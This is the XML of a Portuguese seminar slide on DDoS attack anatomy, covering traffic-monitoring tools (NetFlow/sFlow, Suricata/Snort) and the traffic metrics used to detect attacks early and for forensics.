        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="3000375"/>
            <a:ext cx="18859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Ferramenta de linha de comando para captura e análise de pacotes. Útil para monitoramento em servidores sem interface gráfica.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="85" name="Shape 76"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="3800475"/>
            <a:ext cx="2043113" cy="10429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86" name="Shape 77"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="3914775"/>
            <a:ext cx="228600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8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3996928"/>
            <a:ext cx="114300" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="88" name="Text 78"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5057775" y="3971925"/>
            <a:ext cx="871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NetFlow/sFlow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Text 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="428625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Protocolos para coleta e análise de fluxos de tráfego. Permitem monitorar padrões de tráfego em larga escala.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="90" name="Shape 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="3800475"/>
            <a:ext cx="2043113" cy="104298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1" name="Shape 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="3914775"/>
            <a:ext cx="242888" cy="285750"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3B82F6">
              <a:alpha val="30000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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588" y="3996928"/>
            <a:ext cx="128588" cy="114300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="93" name="Text 82"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7229475" y="3971925"/>
            <a:ext cx="8526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Suricata/Snort</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="94" name="Text 83"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6929438" y="4286250"/>
            <a:ext cx="1885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Sistemas de detecção/prevenção de intrusão (IDS/IPS) que podem identificar padrões de ataque em tempo real.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="95" name="Text 84"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="5000625"/>
            <a:ext cx="42719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Métricas para Identificação de Ataques</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1125" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="96" name="Shape 85"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="5314950"/>
            <a:ext cx="4200525" cy="2243138"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="172A46">
              <a:alpha val="80000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln w="99">
            <a:solidFill>
              <a:srgbClr val="3A6EA5"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Shape 86"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="5429250"/>
            <a:ext cx="1928813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98" name="Text 87"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857750" y="5514975"/>
            <a:ext cx="1828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Volume de Tráfego</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9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5761434"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="Text 88"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936331" y="5757863"/>
            <a:ext cx="107767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Bits por segundo (bps)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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5932884"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Text 89"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936331" y="5929313"/>
            <a:ext cx="127234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Pacotes por segundo (pps)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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6104334"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Text 90"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936331" y="6100763"/>
            <a:ext cx="117768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Fluxos por segundo (fps)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="105" name="Shape 91"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="5429250"/>
            <a:ext cx="1928813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06" name="Text 92"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900863" y="5514975"/>
            <a:ext cx="1828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Distribuição de Protocolos</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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0863" y="5761434"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Text 93"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900863" y="5757863"/>
            <a:ext cx="1139596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Proporção anormal de UDP/TCP/ICMP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10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0863" y="6075759"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="110" name="Text 94"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979444" y="6072188"/>
            <a:ext cx="174466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Protocolos incomuns ou malformados</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Shape 95"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4772025" y="6429375"/>
            <a:ext cx="1928813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12" name="Text 96"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4857750" y="6515100"/>
            <a:ext cx="1828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Padrões de Endereços</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11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750" y="6761559"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Text 97"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936331" y="6757988"/>
            <a:ext cx="137776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Distribuição de IPs de origem</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11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7750" y="6933009"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Text 98"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936331" y="6929438"/>
            <a:ext cx="116669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Geolocalização anômala</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11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7750" y="7104459"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="118" name="Text 99"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936331" y="7100888"/>
            <a:ext cx="124460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IPs conhecidos de botnets</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="119" name="Shape 100"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6815138" y="6429375"/>
            <a:ext cx="1928813" cy="885825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1E3A8A">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="120" name="Text 101"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6900863" y="6515100"/>
            <a:ext cx="1828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Comportamento de Conexão</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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00863" y="6761559"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="122" name="Text 102"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979444" y="6757988"/>
            <a:ext cx="117232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Taxa de novas conexões</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="123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0863" y="6933009"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Text 103"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979444" y="6929438"/>
            <a:ext cx="159467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Conexões incompletas (half-open)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12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00863" y="7104459"/>
            <a:ext cx="50006" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Text 104"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6979444" y="7100888"/>
            <a:ext cx="137229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Duração anormal de sessões</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="127" name="Shape 105"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="7600950"/>
            <a:ext cx="4200525" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5">
              <a:alpha val="20000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="128" name="Shape 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4657725" y="7600950"/>
            <a:ext cx="28575" cy="1000125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="3A6EA5"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="129" name="Text 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743450" y="7686675"/>
            <a:ext cx="4100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Benefícios da Análise de Tráfego:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="130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3450" y="7875984"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="131" name="Text 108"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4900613" y="7872413"/>
            <a:ext cx="209524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Detecção precoce de ataques em andamento</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="132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43450" y="8047434"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="133" name="Text 109"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4900613" y="8043863"/>
            <a:ext cx="191187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Identificação do tipo específico de ataque</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13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43450" y="8218884"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Text 110"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4900613" y="8215313"/>
            <a:ext cx="188924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Ajuste de regras de filtragem e mitigação</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="136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450" y="8390334"/>
            <a:ext cx="100013" cy="100013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="137" name="Text 111"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4900613" y="8386763"/>
            <a:ext cx="231753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Análise forense pós-ataque para melhorar defesas</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="138" name="Shape 112"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="8886825"/>
            <a:ext cx="9144000" cy="314325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="111827">
              <a:alpha val="50000"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Text 113"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285750" y="8972550"/>
            <a:ext cx="2658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Seminário Técnico: Anatomia Avançada de Ataques DDoS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="788" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="140" name="Text 114"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8413412" y="8972550"/>
            <a:ext cx="5162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9/14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2025-06-03T18:07:15Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-06-03T18:07:15Z</dcterms:modified>
</cp:coreProperties>
</file>